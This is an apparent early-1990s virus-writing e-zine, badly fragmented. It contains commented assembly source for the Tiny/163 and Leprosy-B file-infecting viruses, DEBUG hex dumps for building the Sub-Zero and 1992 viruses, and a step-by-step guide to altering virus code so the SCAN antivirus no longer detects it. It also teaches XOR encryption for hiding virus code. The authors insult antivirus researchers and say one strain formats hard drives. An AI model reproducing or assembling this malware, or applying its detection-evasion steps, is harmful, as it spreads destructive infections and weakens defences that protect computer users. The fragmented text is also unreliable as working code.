40H, 2EH, 30H,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2H, 07H, 75H, 1DH,0F9H,0B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30H, 0EH, 07H,0BFH,0D1H,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B8H,0DBH, 05H, 87H, 44H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73H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 48H,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SI+12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W                           ; Store ax to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BYTE PTR [SI+14H]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ET                            ; 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82                  ; Jump if above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WORD PTR [D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82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WORD PTR [DI-6]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1                    ; Shift w/zero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88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No entry poin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OFFSET DATA_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YTE PTR [DI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84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83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H,AH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D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[DI+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WORD PTR [DI-6]  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81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I+5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[DI+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86                  ; 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WORD PTR [DI-0AH]      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AL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87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F                            ; Po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LOC_89                  ; Jump if car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;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LOC_89                  ; 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AX                   ; Zer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                             ;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* No entry poin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W                             ; Conv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OFFSET DATA_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[DI+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88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LOC_88                  ; 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90                  ; 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LOC_85                  ; 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FAR PTR $-8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_A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what do you think!!??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virus is very unusual in the way that it shows man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locations that Command.COM supports.  If you are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version of command.com and examine it for yourself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- just take a look at the file COMMAND.ASM.  I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o through this file and make the corrections necessa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y file compilable.  Sorry about that - but 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... maybe you'll see something kewl.  Keep in mind tha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ssembly, as well as a book will help a lot.  Enjo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sically wraps up the Virus portion of VIRC.  Stay tuned for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I get the time, you'll be seeing many more sour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collection of more informative E-Mags that I have col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40 He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add the following into this E-Mag because of how much I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HEX magazines.  It was those magazines that taught me much of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day about Virii and programming techniques.  I hope i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ey also have several more decompilations, which should hel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rogramming. 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 and dirty zine on wich gives examples on wri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agazines contains code that can be compiled t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nti-virus pussy, who is just scared that your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ased so you have a psycological problem with viruses,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ai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..........................Virus Spotlight, The Ti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...........................How to modify viruses to avoi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...........................Sub-Zer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...........................Simple encryption techniques and Leprosy-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...........................1992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r, Technical Consultant -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ditor, Theory Consultant  - Bionic Sl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IRUS SPOTLIGH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virus I would like to spotlight is the Tiny virus, le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ur good friend Patti Hoffman (bitch) has writte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:     163 COM Virus, Tiny 163 Virus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tatus:  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y:   June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s:    COMMAND.COM &amp; .COM fil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 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 Length:  1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ode:   PNCK - Parasitic Non-Resident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Method:  ViruScan V64+, VirexPC, F-Prot 1.12+, NAV, IBM Sca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nstructions: Scan/D, F-Prot 1.12+, or Delete infect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3 COM Virus, or Tiny Virus, was isolated by Fridrik Skul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eland in June 1990.  This virus is a non-resid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file infector, and it will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file infected with the 163 COM Virus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rus will attempt to infect the first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On bootable diskettes, this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MMAND.COM.  After the first .COM file is infected,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fected program is executed another .COM fil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fected.  Files are infected only if their original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approximately 1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ed .COM files will increase in length by 163 byt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stamps in the directory changed to the date/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n occurred.  Infected files will also always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string: '2A2E434F4D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rus currently does nothing but replicat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MS-DOS virus known as of its iso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ny Virus may or may not be related to the Tin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ike she'd know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s the run down on the smallest MS-DOS virus known to man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ing detected by SCAN we'll se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issasembly of the virus, It can be assembled under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9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2e         equ     1ABh                    ;star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_a           segment byte public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 cs:seg_a, ds:seg_a      ;assume cs, ds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100h                    ;orgin of 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loc_1                   ;jump to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a replacement for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CDh, 20h, 7, 8, 9      ;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ub_1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           proc    near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                      ;locate all virus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si,10Bh                 ;si, cause all off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data_1[si]           ;change when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p,103h                 ;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dx,[si+1A2h]            ;offset of '*.COM',0 - vi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cx                   ;clear cx - find on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Eh                  ;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6                   ;no files found?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9Eh                  ;offset of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3D02h                ;open file for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ax                   ;save handle int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                  ;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dx,[si+1A8h]            ;offset of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dx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3                    ;read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yte ptr [di],0E9h      ;compare buffer to vir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4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Fh                  ;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loc_2             ;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[di+1]               ;lsh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ata_1[si],dx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cx                   ;msh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200h                ;set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di                   ;buffer to s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2                    ;rea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Fh                  ;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word ptr [di],807h      ;compare buffer to vir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loc_3                   ;same? then fi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eres where we inf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dx                   ;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cx                   ;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202h                ;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0                    ;returns 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oc_3                   ;not the same? fi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h,0FEh                 ;lsh = 25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loc_3                   ;if more or equal fi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:data_2e[si],ax       ;poin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                  ;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dx,[si+105h]            ;segment:offset of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0A3h                 ;write 16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loc_5                   ;error?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4200h                ;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cx                   ;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1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40h                  ;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    dx,[si+1ABh]            ;offset of jump to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2                    ;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3Eh                  ;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_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bp                      ;jump to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1          dw      0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*.COM',0               ;wild card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1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_a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good to start off with a simple example like this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irus does is use the DOS 4Eh function to find the firsy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If no files are found the program exits. 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mpares the virus id string (the virus jump instruc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of the COM file.  If they match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match the virus will infect the file.  Using two ke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Function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 =  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=  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=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=   most significant half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=   least "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executing this function the carry flag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will contian the error code.  If no erro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  =   most significant half of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=   least "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and most) important function used by any viru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Function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  =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=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=  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DX =   segmen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  =  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  =  Error Code and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Function 40h i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ah,40h                   ;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bx,handle                ;load bx with handle from prev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cx,virus_size            ;load cx with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dx,offset write_buffer   ;load dx with the offset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21h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by 98% of all MS-DOS viruses to copy it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s a sample project -  create a new strain of Tiny, have i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e and tim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OW TO MODIFY A VIRUS SO SCAN WON'T CATCH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CREATE NEW VIRUS S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ost viruses is that this dickhead who lives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ohn Mcafee gets his greedy hands on them and turns them in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-- for him.   John boy is the reason there are over 500 viru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I wouldn't doubt if he weren't resposible for  writ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thing to do to some Mcafee dependant sucker, or lam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copy of a played out virus, lets say an older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and or Jerusalem.  Almost every virus scanner can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ause they been around so long.  Now heres a quick wa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o the scanners wont catch them, in turn making them new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you need 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on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     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Debugger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rget file like this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elow file with your editor to a file called SAMPL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Debug to make the file SAMPLE.COM executing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&lt; SAMPL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two byte called SAM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 the file with the virus.  If this is a boot sector virus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Do whatever you have to to infect the two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ile and keep i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DISKEDIT, which comes with Norton 6.0 (I'm not sure if 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) PCTOOLS Hex Editor will work too but it take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DISKEDIT Hex-edit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gure out where the middle of the file is.  Next put bloc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file.  At the end of the file go to the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l.  Fill the lower half of the file will nonsense character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select 255d (FFh) the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your changes and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SCAN to scan the file for viruses.  If it detects the vir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delete the search string that SCAN is searching for.  Get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ll SCAN does is search files for strings that are related t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SCAN was looking for CASCADE it look for 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B1DAD1273D1FF12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file you specify.  So what we are doing is narrowing down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 the virus that SCAN keeps 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 have to do is keep deleting parts of the virus with DIS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finally narrow dow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search strings are in the first 150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ets say you narrowed down the search string and lets say it'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8 92 19 B7 21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ly be longer but th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DEBUG - Do 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0100 b8 92 19 b7 21 cd    -- this is the string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unassembled look at what the id-string i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ax,19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bx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what you have to do, and keep in mind the follow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KES A SOMEWHAT KNOWING OF ASSEMBLER AND HOW IT WORK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urbo Debugger to find the string, you can use DEBUG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from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ay you got the string on the scree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ax,19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  bh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locations in the file where these strings are.  Ex 0100h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rrange the AX mov with the BX mov like thi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bh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ax,19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?  You didn't change the way the code functions (THATS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DOING!) but you changed the codes id-string fo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nce Turbo Debugger dosent let you save the changes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-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vi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0122  - This is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assembler instru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bh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ax,19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nd SCAN it, if SCAN doesn't catch it Congrats.  If it do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b.  Oh well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, this only works with un-encrypting viruses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chanism of encrypting files (which will most likely be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UB-ZERO VIR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s one for all of you who don't have an assembl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debug by naming the insert below SUB-ZERO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&lt; SUB-ZERO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ub-ze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0  E9 92 00 DA AA A3 AA D4 3A A3 00 01 23 3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10  00 02 00 04 01 64 30 A0 06 55 2E 56 05 9F 19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20  3E 00 00 00 00 00 00 00 00 00 00 00 00 00 E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30  0E 97 30 80 00 00 00 80 00 97 30 5C 00 97 30 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40  00 97 30 00 40 46 63 F4 1D D0 5C 00 00 46 00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50  5A A0 01 39 00 B4 02 AF 00 7C 04 7C A4 FA 0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60  07 84 19 C5 00 FA 05 1C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70  05 00 20 00 21 00 28 02 00 02 10 00 90 6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80  B9 41 2A 97 4C 4F 52 44 20 53 4B 49 53 4D 2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90  00 00 00 00 00 FC B4 E0 CD 21 3D 00 E0 73 1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A0  FC 03 72 11 BF 00 01 B4 DD BE 10 07 03 F7 2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B0  8D 11 00 CD 21 8C C8 04 10 00 8E D0 BC 00 0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C0  B8 C5 00 50 CB 06 FC 2E 8C 06 31 00 2E 8C 06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D0  00 2E 8C 06 3D 00 2E 8C 06 41 00 8C C0 05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E0  2E 01 06 49 00 2E 01 06 45 00 B4 E0 CD 21 8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F0  E0 73 13 80 FC 03 07 2E 8E 16 45 00 2E 8B 26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00  00 2E FF 2E 47 00 33 C0 8E C0 8B 89 31 DB 2E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10  4B 00 26 A0 FE 03 2E A2 4D 00 26 C7 06 FC 03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0  A5 26 C6 06 FE 03 CB 58 04 10 90 8E C0 0E 1F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30  00 03 B1 88 33 F6 8B FE 06 B8 42 01 50 EA FC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40  00 00 8C C8 8E D0 BC 00 07 33 C0 8E D8 2E A1 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50  00 A3 FC 03 2E A0 4D 00 A2 FE 03 8B DC B1 04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60  EB 83 C3 10 2E 89 1E 33 00 B4 4A 2E 8E 06 3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70  CD 21 B8 21 35 CD 21 2E 89 1E 17 00 2E 8C 06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80  00 0E 1F BA 5B 02 B8 21 25 CD 21 8E 06 31 00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90  8E 06 2C 00 33 FF B9 FF 7F 32 C0 F2 AE 26 38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A0  E0 F9 8B D7 83 C2 03 B8 00 4B 06 1F 0E 07 B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B0  00 52 51 53 50 06 1E B4 2A CD 21 2E C6 06 0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C0  00 81 F9 C6 07 74 30 3C 05 75 0D 80 FA 17 7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D0  2E FE 06 0E 00 EB 20 90 B8 08 35 CD 21 2E 89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E0  13 00 2E 8C 06 15 00 0E 1F C7 06 1F 00 48 3F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F0  08 25 BA 1E 02 CD 21 1F 07 58 5B 59 5A 9C 2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00  1E 17 00 1E 07 B4 49 CD 21 B4 4D CD 21 B4 31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10  00 06 B1 04 D3 EA 83 C2 10 CD 21 32 C0 CF 2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20  3E 1F 00 09 75 17 52 51 50 B4 2A CD 21 81 FA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30  06 75 07 B8 01 07 B2 80 CD 13 58 59 5A 2E 83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40  1F 00 01 EB 11 20 20 53 75 62 2D 5A 65 72 6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50  4E 59 48 43 20 20 2E FF 2E 13 00 9C 80 FC E0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60  05 B8 00 03 9D CF 80 FC DE 74 2D 80 FC DD 74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70  3D 00 4B 75 03 E9 B4 00 9D 2E FF 2E 17 00 58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80  B8 00 01 2E A3 0A 00 58 2E A3 0C 00 F3 A4 9D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90  A1 0F 00 2E FF 2E 0A 00 83 C4 06 9D 8C C8 8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A0  BC 10 07 06 06 33 FF 0E 07 B9 10 00 8B F3 B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B0  00 F3 A4 8C D8 8E C0 2E F7 26 7A 00 2E 03 06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C0  00 83 D2 00 2E F7 36 7A 00 8E D8 8B F2 8B FA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D0  C5 2E 8B 1E 2F 00 0B DB 74 13 B9 00 80 F3 A5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E0  00 10 81 C5 00 10 8E D8 8E C5 4B 75 ED 2E 8B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F0  2D 00 F3 A4 58 50 05 10 00 2E 01 06 29 00 2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00  06 25 00 2E A1 21 00 1F 07 2E 8E 16 29 00 2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10  26 27 00 2E FF 2E 23 00 33 C9 B8 01 43 CD 21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20  3C CD 21 B8 00 4B 9D 2E FF 2E 17 00 2E 80 3E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30  00 01 74 E4 2E C7 06 70 00 FF FF 2E C7 06 8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40  00 00 2E 89 16 80 00 2E 8C 1E 82 00 50 53 51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50  56 57 1E 06 FC 8B FA 32 D2 80 7D 01 3A 75 05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60  15 80 E2 1F B4 36 CD 21 3D FF FF 75 03 E9 77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70  F7 E3 F7 E1 0B D2 75 05 3D 10 07 72 F0 2E 8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80  80 00 1E 07 32 C0 B9 41 00 F2 AE 2E 8B 36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90  8A 04 0A C0 74 0E 3C 61 72 07 3C 7A 77 03 80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A0  20 46 EB EC B9 0B 00 2B F1 BF 84 00 0E 07 B9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B0  00 F3 A6 75 03 E9 2F 02 B8 00 43 CD 21 72 05 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C0  89 0E 72 00 72 25 32 C0 2E A2 4E 00 1E 07 8B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D0  B9 41 00 F2 AE 80 7D FE 4D 74 0B 80 7D FE 6D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E0  05 2E FE 06 4E 00 B8 00 3D CD 21 72 5A 2E A3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F0  00 8B D8 B8 02 42 B9 FF FF BA FB FF CD 21 72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00  05 05 00 2E A3 11 00 B9 05 00 BA 6B 00 8C C8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10  D8 8E C0 B4 3F CD 21 8B FA BE 05 00 F3 A6 75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20  B4 3E CD 21 E9 C0 01 B8 24 35 CD 21 89 1E 1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30  8C 06 1D 00 BA 1B 02 B8 24 25 CD 21 C5 16 8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40  33 C9 B8 01 43 CD 21 72 3B 2E 8B 1E 70 00 B4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50  CD 21 2E C7 06 70 00 FF FF B8 02 3D CD 21 72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60  2E A3 70 00 8C C8 8E D8 8E C0 8B 1E 70 00 B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70  57 CD 21 89 16 74 00 89 0E 76 00 B8 00 42 33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80  8B D1 CD 21 72 3D 80 3E 4E 00 00 74 03 EB 57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90  BB 00 10 B4 48 CD 21 73 0B B4 3E 8B 1E 70 0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A0  21 E9 43 01 FF 06 8F 00 8E C0 33 F6 8B FE B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B0  07 F3 A4 8B D7 8B 0E 11 00 8B 1E 70 00 06 1F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C0  3F CD 21 72 1C 03 F9 33 C9 8B D1 B8 00 42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D0  BE 05 00 B9 05 00 F3 2E A4 8B CF 33 D2 B4 4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E0  21 72 0D E9 BC 00 B9 1C 00 BA 4F 00 B4 3F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F0  72 4A C7 06 61 00 84 19 A1 5D 00 A3 45 00 A1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00  00 A3 43 00 A1 63 00 A3 47 00 A1 65 00 A3 4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10  A1 53 00 83 3E 51 00 00 74 01 48 F7 26 78 0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20  06 51 00 83 D2 00 05 0F 00 83 D2 00 25 F0 FF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30  7C 00 89 16 7E 00 05 10 07 83 D2 00 72 3A F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40  78 00 0B D2 74 01 40 A3 53 00 89 16 51 00 A1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50  00 8B 16 7E 00 F7 36 7A 00 2B 06 57 00 A3 6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60  C7 06 63 00 C5 00 A3 5D 00 C7 06 5F 00 10 07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70  C9 8B D1 B8 00 42 CD 21 72 0A B9 1C 00 BA 4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80  B4 40 CD 21 72 11 3B C1 75 18 8B 16 7C 00 8B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90  7E 00 B8 00 42 CD 21 72 09 33 D2 B9 10 07 B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A0  CD 21 2E 83 3E 8F 00 00 74 04 B4 49 CD 21 2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B0  3E 70 00 FF 74 31 2E 8B 1E 70 00 2E 8B 16 7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C0  2E 8B 0E 76 00 B8 01 57 CD 21 B4 3E CD 21 2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D0  16 80 00 2E 8B 0E 72 00 B8 01 43 CD 21 2E C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E0  1B 00 B8 24 25 CD 21 07 1F 5F 5E 5A 59 5B 58 9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F0  2E FF 2E 17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00  4D 9F 19 00 10 00 00 00 45 44 00 45 4C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10  E9 92 00 DA AA A3 AA D4 3A A3 00 01 23 31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20  00 02 00 04 01 64 30 A0 06 55 2E 56 05 9F 19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30  3E 00 00 00 00 00 00 00 00 00 00 00 00 00 E8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40  0E 97 30 80 00 00 00 80 00 97 30 5C 00 97 30 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50  00 97 30 00 40 46 63 F4 1D D0 5C 00 00 46 00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60  5A A0 01 39 00 B4 02 AF 00 7C 04 7C A4 FA 0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70  07 84 19 C5 00 FA 05 1C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80  05 00 20 00 21 00 28 02 00 02 10 00 90 6A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90  B9 41 2A 97 4C 4F 52 44 20 53 4B 49 53 4D 2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A0  00 00 00 00 00 FC B4 E0 CD 21 3D 00 E0 73 16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B0  FC 03 72 11 BF 00 01 B4 DD BE 10 07 03 F7 2E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C0  8D 11 00 CD 21 8C C8 04 10 00 8E D0 BC 00 0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D0  B8 C5 00 50 CB 06 FC 2E 8C 06 31 00 2E 8C 06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E0  00 2E 8C 06 3D 00 2E 8C 06 41 00 8C C0 05 1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F0  2E 01 06 49 00 2E 01 06 45 00 B4 E0 CD 21 8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00  E0 73 13 80 FC 03 07 2E 8E 16 45 00 2E 8B 26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10  CD 20 A3 AA D4 3A A3 1A 1A 1A 1A 1A 1A 1A 1A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 is a memory resident COM and EXE infector that is based somew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erusalem-B.  It is the ansestor to the virus Captian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is time has not been nailed b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because this virus will most likly format you hard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the wrong day.  One day of the year it will perform a H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in June, hmmmm...  D-Day rings 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can-77 this virus can not be detected by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IMPLE ENCRYPTION METHO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is perhaps one of the key parts of writing a vir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 that prints a message to the screen, you don't want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ntain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asy way to encrypt data is the XOR method.  XOR is a mata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cifer and decifer data with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  xor  A1  =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encrypt^       ^key   ^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E  xor  A1  =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you can see an easy way to encrypt/decrypt sensitve data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virus that demonstrates this teqnique is Leprosy-B.  By st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 you are on the way to make simple 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&lt;LEPROSYB.ASM&gt;   -   Leprosy-B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Copy-ya-right (c) 1990 by PC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file is the source code to the Leprosy-B viru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assembled with an MASM-compatible assembler;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assembles correctly with both MASM 4.0 and Turbo Assembl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should be made into a .COM file before executing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"/t" command line flag in TLINK or Microsoft's EXE2B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has the potential to permanently destro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mages on any disk medium.  Other modifications may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sequent to the original release by the author, either ben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r which could result in further harm should this program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"Leprosy-B Virus by PCM2, August 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  equ     13              ;  Carriage retur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  equ     10              ;  Linefe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equ     9               ;  Tab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size      equ     666             ;  Size of the vir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_start      equ     100h            ;  Address right after PSP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        equ     80h             ;  Addr of defaul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amp       equ     24              ;  Offset in DTA of file's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      equ     22              ;  Offset in DTA of file'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equ     30              ;  Offset in DTA of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equ     21              ;  Offset in DTA of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segment 'code'          ;  Open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ds:code         ;  One segment for both code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code_start      ;  Start code image after P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executable code is contained in boundaries of procedure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code, until the start of "virus_code", i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crypted CMT portion of the code to load up the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proc    near                    ;  Code execution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ncrypt_decrypt         ;  Decrypt the real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andom_mutation         ;  Put the virus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_val     db      00h             ;  Hold value to encrypt b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  Encrypt, save, and restore the virus code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handle               ;  Ge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                      ;  Save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ncrypt_decrypt         ;  Encrypt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                      ;  Get back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virus_size           ;  Total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code_start           ;  Buffer where code star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0h                  ;  DOS write-to-hand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 Write the virus cod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ncrypt_decrypt         ;  Restore the cod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   ;  Go back to where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  Encrypt or decrypt the virus code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_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offset virus_code    ;  Get address to start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loop:                               ;  Start cyc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[bx]                 ;  Get th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h,encrypt_val          ;  Engage/disengage XOR schem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x],ah                 ;  Put it back where w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                      ;  Move BX ah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offset virus_code+virus_size  ;  Are we a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    xor_loop                ;  If not, do anoth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   ;  and go back where w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rest of the code from here on remains encrypted until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ing a fundamental XOR technique that changes via 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strings are kept here in the file, and automaticall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lease don't be a lamer and change the strings and say you wrote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cause of Cybernetic Mutation Technology(tm), the CRC of this fil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s, even when the strings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filespec    db      "*.EXE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filespec    db      "*.COM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ir          db      "..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_msg        db      cr,lf,"Program too big to fit in memory$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msg1      db      cr,lf,tab,"ATTENTION!  Your computer has been afflicted with$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msg2      db      cr,lf,tab,"the incurable decay that is the fate wrought by$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msg3      db      cr,lf,tab,"Leprosy Strain B, a virus employing Cybernetic$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msg4      db      cr,lf,tab,"Mutation Technology(tm) and invented by PCM2 08/90.$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buf     db      20 dup (?)      ;  Buffer to comp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foun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infected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_time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_date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_attr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mutation:                        ; First decide if virus is to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2ch                  ; Set up DOS function to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ncrypt_val,0           ; Is this a first-run viru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install_val             ; If so, install whatev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h,15                   ; Is it less than 16 sec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     find_extension          ; If not, don't mutat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l,0                    ; Will we be encrypting using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random_mutation         ; If so, get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ncrypt_val,dl          ; Otherwise, sav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extension:                         ; Locate file w/ vali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iles_found,0           ; Count infected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files_infected,4        ; BX counts file infec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ucces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0100111b            ; Look for all fla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exe_filespec  ; Check for .EXE extens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eh                  ; Call DOS find fir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12h                  ; Are no files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find_com                ; If not, nothing mo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ind_healthy            ; Otherwise, try to find health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0100111b            ; Look for all fla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com_filespec  ; Check for .COM exten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eh                  ; Call DOS find fir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12h                  ; Are no files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chdir                   ; If not, step ba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ind_healthy            ; Otherwise, try to find healthy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:                                  ; Routine to step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newdir        ; Load DX with address o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bh                  ; Change directory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files_infected          ; This counts as inf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find_exe                ; If we're still rolling,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exit_virus              ; Otherwise let's pa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ealt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dta                  ; Point BX to address of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x]+attribute       ; Get the current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rig_attr,ax            ;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x]+timestamp       ; Get the current file'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rig_time,ax            ;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bx]+datestamp       ; Get the current file's data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orig_date,ax            ;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dta+filename         ; Get the filename to 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                    ; Clear all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                    ; Set attribute su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3h                  ; Call DOS servic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                    ; Set up to open handle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dh                  ; Open file handle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handle,ax               ; Sav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                   ; Transfer the handle to BX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20                   ; Read in the top 20 by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compare_buf   ; Use the small buffer u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fh                  ; DOS read-from-hand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offset compare_buf   ; Adjust the encry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encrypt_val          ; for accurat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bx+6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code_start           ; One array to compare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offset compare_buf   ; The other array i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s                   ; Transfer the DS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                   ; ...to the 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    cmpsb                   ; Compare the buffer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healthy                 ; If different, the file is health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lose_file              ; Close it up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files_found             ; Chalk up another fu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fh                  ; Find next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Try to find another same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12h                  ; Are there any mor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no_more_found           ; If not, get outt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find_healthy            ; If so, try the process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ore_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        ; Go back to where w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handle               ; Get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eh                  ; Close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dh                  ; Open it again, to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dta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handle,ax               ; Save the hand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infect_file             ; Infect the healt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lose_file              ; Close down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uccess                 ; Indicate we did someth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files_infected          ; Scratch off another file on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exit_virus              ; If we're through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ontinue_search         ; Otherwise,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handle               ; Get the file handle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orig_time            ; Get th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rig_date            ; Get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                    ; Set file date/time sub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57h                  ; Get/Set file date and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eh                  ; Close handle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orig_attr            ; Get the file's origin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                    ; Instruct DOS to put it b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dta+filename         ; Feed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3h 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files_found,6           ; Are at least 6 files inf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print_fake              ; If not, keep a low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success,0               ; Did we infect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     print_fake              ; If so, cover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9h                  ; Use DOS print st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virus_msg1    ; Load the address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virus_msg2    ; Load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virus_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virus_ms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f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9h                  ; Use DOS to print fak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fak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ch                  ; DOS terminate pro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                     ; Call DOS to get ou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db       8 dup (90h)    ; Pad out the file length to 66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irus is no great wonder the simple encryption method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most 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92 VIR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for you virus fiends.  Its been labled 1992, the la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viruses brought to you by SK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irus is no groundbreaker - the graphic displa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ll go down in history as the first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elow to a file called  1992.USR then execu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BUG &lt; 1992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99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0  EB 02 90 02 E8 03 00 E9 E7 05 51 BB 38 01 8A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10  32 2E 03 01 88 2F 43 81 FB 00 09 7E F1 59 C3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20  00 01 8B 1E E5 06 53 E8 E0 FF 5B B9 C8 07 B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30  CD 21 53 E8 D4 FF 5B C3 0D 10 1B 00 08 B1 1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40  C1 18 22 C6 BD 1B 01 B1 1B 15 B1 1B 01 1A 1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50  C1 18 04 C6 DB 02 B3 B3 14 18 19 B3 10 DF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60  08 B1 1B 01 C1 18 0C C6 C0 18 05 C6 C3 C6 B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70  22 1A 1B 00 B1 1B 06 02 B3 B3 14 18 1D B3 10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80  22 08 C2 C6 C6 C0 C6 DB 1B 0C B1 1B 0B B1 2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90  1A 1B 00 B1 1B 01 02 B3 B3 14 18 23 B3 10 DF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A0  00 08 B1 1B 12 B1 1B 0B C2 C6 C6 1A 1B 00 B1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B0  00 02 B3 B3 14 18 21 B3 10 DF 22 13 1B 06 0B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C0  10 22 13 22 DC 10 22 13 22 DC 10 22 13 22 D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D0  22 13 1B 06 DC 10 22 13 22 22 DC 10 22 22 1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E0  22 DC 10 22 22 1A 1B 00 08 B1 22 22 02 B3 B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F0  18 0A B3 0D 18 1A B3 02 10 DF 14 B3 B3 B3 10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00  13 22 0B DC 02 10 18 06 B3 13 22 0B DC 22 DC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10  10 B3 B3 13 22 0B DC 02 10 B3 13 22 0B DC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0  18 06 B3 13 22 0B DC 22 DC 22 DC 22 DC 02 10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30  22 1A 1B 00 08 B1 22 22 02 B3 B3 14 18 05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40  18 1B B3 02 10 DF 22 22 14 B3 10 DF 13 1B 06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50  DC 10 22 13 22 22 DC 02 10 B3 22 22 13 22 0B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60  02 10 B3 13 1B 06 0B DC 10 22 13 22 DC 02 10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70  13 22 0B DC 02 10 B3 13 22 0B DC 02 10 B3 22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80  08 C6 C6 C0 DB 22 22 02 B3 B3 14 18 05 B3 0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90  0E B3 12 1B 05 14 18 01 B3 02 10 DF 1B 00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A0  22 22 02 B3 B3 B3 13 22 0B DC 02 10 B3 13 22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B0  DC 22 DC 02 10 B3 22 13 22 0B DC 02 10 B3 2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C0  B3 B3 13 22 0B DC 02 10 B3 13 22 0B DC 02 10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D0  22 B3 B3 13 22 0B DC 02 10 B3 22 1A 22 22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E0  1B 00 02 B3 B3 14 18 05 B3 0D 18 0E B3 12 DC D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F0  D9 02 14 B3 B3 B0 B0 0D 12 D9 14 B3 B3 B3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00  DF 1B 01 08 B1 22 13 1B 06 0B DC 02 10 B3 1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10  0B DC 02 10 B3 13 22 0B DC 02 10 B3 13 22 0B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20  02 10 B3 13 1B 06 0B DC 02 10 B3 13 22 0B DC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30  10 B3 1B 00 13 22 0B DC 02 10 B3 22 1A 22 2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40  B1 1B 00 02 B3 B3 14 18 05 B3 0D 18 0E B3 12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50  D9 D9 02 14 B3 B3 B3 B0 0D 12 D9 14 B3 B3 0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60  DF 1B 06 08 B1 22 22 02 18 07 B3 22 B3 B3 2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70  B3 22 B3 B3 22 18 07 B3 22 B3 B3 1B 00 B3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80  22 1A 22 22 08 B1 1B 00 02 B3 B3 14 18 01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90  B3 B3 B3 02 B3 0D 18 0E B3 12 DC 18 07 D9 14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A0  B3 02 10 DF 1B 01 08 D8 C6 DB 1B 18 D8 C6 C6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B0  BD 22 22 1A 22 22 B1 1B 01 02 B3 B3 14 B3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C0  0D 18 18 B3 02 10 DF 1B 00 08 C1 18 04 C6 C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D0  16 C6 DB 1B 00 B1 22 22 1A 22 22 C1 18 01 C6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E0  02 B3 B3 0D 14 18 1F B3 02 10 DF 22 22 08 B1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3F0  07 16 22 0D 14 56 16 6A 67 22 6F 63 6C 22 75 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00  6D 22 60 70 6D 77 65 6A 76 22 7B 6D 77 22 1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10  22 08 B1 22 22 1A 22 22 B1 1B 01 B1 02 B3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20  14 18 1E B3 02 10 DF 1B 00 08 B1 1B 01 02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30  16 22 0D 34 30 30 2E 22 51 69 6B 71 6F 22 4D 6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40  67 2E 22 41 63 72 76 6B 63 6C 22 10 22 22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50  22 22 1A 22 22 B1 1B 01 B1 02 B3 B3 0D 14 1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60  B3 02 10 DF 0D 14 18 05 B3 02 10 DF 1B 01 08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70  1B 01 02 B3 B3 16 22 0D 56 70 6B 72 71 2E 2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80  6C 66 22 51 77 60 2F 58 67 70 6D 22 6C 6D 7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90  10 22 22 08 B1 22 22 1A 22 22 B1 1B 01 B1 0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A0  B3 0D 14 18 10 B3 02 10 DF 1B 01 08 B1 1B 05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B0  1B 01 02 B3 B3 16 22 0D 71 6A 63 6C 69 71 22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C0  6D 77 22 63 65 63 6B 6C 2E 22 22 75 6B 76 6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D0  10 22 22 08 C2 C6 C6 1A 22 22 B1 1B 01 B1 02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E0  B3 0D 14 18 10 B3 02 10 DF 1B 01 08 C2 C6 C6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4F0  1B 06 C1 C6 BD 22 22 02 B3 B3 16 22 0D 6A 6B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00  22 6E 63 76 67 71 76 2C 2C 2C 1B 08 10 1B 06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10  22 22 08 C2 C6 C6 C0 C6 C3 02 B3 B3 0D 14 1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20  B3 02 10 DF 1B 07 08 B1 1B 06 B1 22 B1 22 2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30  18 1A B3 1B 04 1A 1B 06 08 B1 22 22 02 B3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40  14 18 15 B3 02 10 DF 22 22 08 B1 1B 06 B1 22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50  18 1E C6 BD 1B 01 1A C6 C6 C0 C6 C6 DB 22 2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60  B3 B3 0D 14 18 14 B3 02 10 DF 1B 00 08 C1 C6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70  C6 C0 C6 DB 1B 07 17 22 0C 51 69 6B 71 6F 2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80  3B 3B 30 22 2F 22 54 6B 70 77 71 18 01 23 2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90  22 08 C1 18 01 C6 1A 22 22 B1 1B 06 02 B3 B3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A0  14 18 0A B3 02 10 DF 1B 0A 08 D8 18 04 C6 DB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B0  00 B1 1B 07 02 B3 B3 17 1B 01 0D 45 67 76 2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C0  22 6E 63 76 67 22 72 63 71 71 23 1B 01 10 22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D0  B1 1B 01 1A D8 C6 DB 1B 00 02 B3 B3 0D 11 18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E0  D9 14 D9 D9 12 DF 10 1B 07 08 B1 1B 08 B1 1B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5F0  02 18 1A B3 22 22 08 B1 1B 01 1A B1 22 02 B3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00  0D 11 18 19 D9 02 10 DF 1B 05 08 B1 1B 11 D8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10  09 C6 DB 1B 01 1A 02 B3 B3 0D 12 18 22 D9 D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20  1B 06 08 B1 1B 11 B1 1B 12 1A 0D 12 18 21 D9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30  10 1B 01 08 C2 18 11 C6 DB 1B 12 1A 28 02 28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40  47 5A 47 02 5E 02 01 3D 3D 3D 3D 3D 3D 3D 3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50  22 22 11 01 02 02 02 28 D3 EF 48 13 68 7B D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60  02 02 02 02 46 4D 51 02 22 22 22 2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70  02 01 3D 3D 3D 3D 3D 3D 3D 3D 47 5A 47 05 07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80  23 02 28 D3 EF 48 22 2A 00 23 02 00 02 02 02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90  43 50 45 47 50 2C 47 5A 47 02 02 02 95 32 4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A0  73 04 95 32 02 56 47 4F 5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B0  02 02 02 02 02 02 02 02 0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C0  02 02 02 02 02 02 02 02 0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D0  02 02 02 02 02 02 02 02 02 02 02 02 02 02 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E0  02 02 02 02 02 07 02 2A 00 23 02 22 02 CF 2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6F0  02 BA 02 32 CF 23 3E 01 70 29 B6 2E CF 23 8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00  01 03 B6 28 CF 23 82 F8 1B 7E 06 3E 07 76 01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10  77 92 BC 3A 03 BA 02 BA 8C C2 BD 02 02 BB 06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20  EA 07 02 E9 FC EB 88 02 E1 59 89 D5 31 C2 FE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30  3E 22 70 07 A9 E0 FA E9 4E 3E 12 71 05 82 E6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40  08 E2 E9 F3 3E 1A 76 11 71 1B 2E 12 00 C2 00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50  00 C2 00 C2 82 E6 8D 08 E2 E9 D8 83 C0 A2 02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60  F8 E9 D0 3E 19 70 05 77 CE 82 F6 82 E9 C5 3E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70  89 DB AE 88 CA B2 22 76 00 AE 49 30 EF 43 F1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80  89 C9 4B E2 A8 C1 B8 44 04 B6 18 CF 23 B6 1B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90  23 88 D2 FC C0 B6 45 BC A7 04 CF 23 B8 46 04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A0  39 CF 23 BB 11 02 B8 3E 04 B6 4C CF 23 3F 1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B0  77 01 E9 53 92 B6 4D CF 23 3F 10 02 76 45 B8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C0  04 B6 39 CF 23 B6 2D CF 23 8E 04 9E 04 8B 1C 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D0  04 B8 73 04 B6 18 CF 23 BB 05 02 B8 3C 04 B6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E0  CF 23 3F 10 02 77 23 B6 4D CF 23 3F 10 02 77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7F0  B8 46 04 B6 39 CF 23 B6 18 8C 1C 9E 04 89 14 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00  04 CF 23 